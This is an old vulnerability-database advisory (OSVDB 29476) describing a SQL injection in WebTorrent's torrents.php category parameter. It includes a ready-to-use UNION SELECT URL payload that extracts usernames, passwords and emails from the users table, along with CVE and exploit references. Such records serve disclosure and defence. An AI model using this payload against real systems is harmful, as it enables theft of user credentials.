WebTorrent torrents.php cat Variable SQL Injection

2006-08-17T22:53:15
ID OSVDB:29476
Type osvdb
Reporter OSVDB
Modified 2006-08-17T22:53:15

Description

Manual Testing Notes

http://[target]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/*

References:

ISS X-Force ID: 28426 Generic Exploit URL: http://www.milw0rm.com/exploits/2200 CVE-2006-4238 Bugtraq ID: 19569